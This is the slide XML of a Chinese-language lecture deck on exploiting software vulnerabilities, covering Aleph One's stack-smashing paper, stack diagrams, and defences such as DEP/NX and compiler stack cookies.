                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows 10</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pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E63061-9DDA-E607-7B19-91AF0259F5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018208" y="2129306"/>
            <a:ext cx="3556183" cy="1447874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2253E7D4-A4F6-2510-71E6-B4BB71A210E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7091271" y="4166646"/>
            <a:ext cx="3556183" cy="1447874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375616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02839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漏洞利用（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Exploit</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历史事件</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8259"/>
            <a:ext cx="4824536" cy="4289123"/>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1996</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年，</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Aleph One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Underground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发表了著名论文</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Smashing the stack for fun and profit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其中详细描述了</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Linux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系统中栈的结构和如何利用基于栈的缓冲区溢出漏洞。</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在这篇具有划时代意义的论文中，</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Aleph One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演示了如何向进程中植入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一段用于获得</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的代码，</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并在论文中称这段被植入进程的代码为</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DCB2067A-5DC1-759E-C799-1864F72C41F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910369" y="1708259"/>
            <a:ext cx="4824536" cy="236551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漏洞利用是指针对已有的漏洞，根据漏洞的类型和特点而采取相应的技术方案，进行尝试性或实质性的攻击。</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有漏洞不一定能利用，能利用就肯定有漏洞。</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125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032" y="1150876"/>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思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487DA4E5-B82C-2059-9460-F6BA998A17BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1704504"/>
            <a:ext cx="4968552"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数据执行保护</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Data Execute Prevention)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技术可以限制内存</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>堆栈</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区的代码为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>不可执行</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状态，从而防范溢出后代码的执行。</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启用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机制后，</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机制将数据区设置不可执行的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non-executable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标志位，因此在溢出后即使跳转到恶意代码的地址，恶意代码也将无法运行，从而有效地阻止了缓冲区溢出攻击的执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="文本框 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB88CE0-6426-7D1C-318F-C85A53F18A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858220" y="1125339"/>
            <a:ext cx="445987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思考：如何防止</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执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455B9B66-6AF6-9E72-6C7B-7E1D630845C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="1954651"/>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6302E563-5F17-89BE-85D4-3DDB4078A7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484007" y="197402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8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24DAC3E2-B705-BC14-1BFC-572EF4C82131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487488" y="5506194"/>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9" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752FD81E-2B7E-5320-6082-37B6FB20959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="26986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2EC9F33-1C85-B0E6-7045-C583A4FB4F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="2329146"/>
            <a:ext cx="1428888" cy="375428"/>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00 12 FA F0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600"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27858414-F466-BEB7-11F2-A46A2A4349C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="2712118"/>
            <a:ext cx="1428891" cy="345791"/>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2" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A1F5447-3F83-B48D-1F0E-1D10394A5A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501604" y="306653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6C81473-E9A5-8793-D262-A17975536688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="3077604"/>
            <a:ext cx="1428888" cy="349796"/>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6" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E191BC-4092-1D9F-7981-9FC96EDCE8A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="342740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8E7F377-7F4E-DFED-9E08-F3B8C7DDAE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3441960"/>
            <a:ext cx="1428889" cy="378573"/>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8" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C1DCE8-4148-D7B9-40A3-C6AEB856A3A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="382053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7F8B9656-B023-EA10-7BC5-911AF0AF5224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380829" y="2727980"/>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0" name="直线箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B997795A-9B26-75CD-E815-BE59A763B94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4112907" y="2888632"/>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236CF50-2644-C770-F6EC-933BCADEF36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445822" y="5529176"/>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2" name="直线箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4977C8-2042-0771-A787-877501E9475D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131959" y="5698453"/>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连接符 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85089AF4-0DC6-00F0-77AA-DD30F28E6CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="423830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C7C53BD-1DE0-C888-A8AA-49EE07F5FF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3835033"/>
            <a:ext cx="1428891" cy="394649"/>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76C817FB-6CEA-124D-F439-4DEB2B2121B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="4251512"/>
            <a:ext cx="1428889" cy="377929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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74 73 65 77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6" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D78C43E-272C-9457-3D56-91B8A7F4CF20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="463807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FC5EE52A-F60B-1373-EF48-74D1933417B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="4652749"/>
            <a:ext cx="1428888" cy="401043"/>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68 53 DB 33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8" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B53FB44-8315-5153-4872-0F3B65D2A230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="506242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29" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87DDB8C4-0C86-5C72-B27F-DB28C4BA3F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="232914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34FA437-07E9-B8AB-A9E7-9035CEAA9AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="1950497"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="肘形连接符 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B38272-D722-D2D2-C6B5-BD1B507B6A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1120221" y="3511739"/>
            <a:ext cx="2376264" cy="386507"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99933"/>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连接符 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EF6FFAB-6600-8CEB-B902-000A9B75DCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2115099" y="2521474"/>
            <a:ext cx="409579"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53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DEP</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391728"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硬件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DEP</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82303"/>
            <a:ext cx="4824536" cy="3176960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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硬件</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需要</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的支持</a:t>
            </a:r>
            <a:r>
              <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需要</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在页表增加一个保护位</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NX(no execute)</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来控制页面是否可执行。</a:t>
            </a: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现在</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一般都支持硬件</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NX</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所以现在的</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保护机制一般都采用的硬件</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对于</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设置</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non-executable</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标志位的内存区域，</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会添加</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NX</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>保护位来控制内存区域的代码执行。</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380738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编译器选项</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/NXCOMPAT</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80408"/>
            <a:ext cx="4824536" cy="1211101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>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此外，</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Visual Studio</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编译器提供了一个链接标志</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/NXCOMPAT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，可以在生成目标应用程序的时候使程序启用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DEP</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保护。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932192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032" y="1150876"/>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思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487DA4E5-B82C-2059-9460-F6BA998A17BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1704504"/>
            <a:ext cx="4968552" cy="4673780"/>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stack</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protection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技术是一项缓冲区溢出的检测防护技术。</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编译器中提供了一个</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编译选项，在使用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VC7.0</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Visual Studio 2005</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及后续版本编译时都支持该选项，如选择该选项，编译器针对函数调用和返回时添加保护和检查功能的代码，在函数被调用时，在缓冲区和函数返回地址之间增加一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>位的随机数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>security_cookie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在函数返回时，调用检查函数检查</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security_cookie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的值是否有变化。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9ED5CF-6E89-FB13-8F76-76856FFA7C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858220" y="1125339"/>
            <a:ext cx="445987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思考：如何防止</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执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="矩形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4157A527-8EC6-7A77-7129-91AC472515D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166393" y="3226981"/>
            <a:ext cx="1560988" cy="37544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文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F08E8FE-D6F0-729B-F694-3CA08B2B003B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143469" y="3247051"/>
            <a:ext cx="1675459"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security cookie</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6" name="直接连接符 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96E75B8-85B8-DD63-0E06-AF13C73D0C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3948170" y="3236369"/>
            <a:ext cx="229302" cy="12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09250C4-CC8F-64EA-DA61-8998697ACA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938657" y="3242816"/>
            <a:ext cx="224720" cy="35961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D0481EC6-AD13-8570-425D-16D0BCF02A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="1954651"/>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文本框 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF052DC8-A568-0DE5-EBFB-A026EE791722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484007" y="197402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72" name="文本框 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3369620-EA73-6F9E-E1D8-A551EE816EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487488" y="5506194"/>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73" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253E9DDD-3B85-E129-7508-F56A1DD3D284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="26986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FCC13C3-41ED-2EC5-C4AB-B4723B24E834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="2329146"/>
            <a:ext cx="1428888" cy="375428"/>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00 12 FA F0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="文本框 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A8DD6B-D1A7-9979-43C1-7FED9503B5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="2712118"/>
            <a:ext cx="1428891" cy="345791"/>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76" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
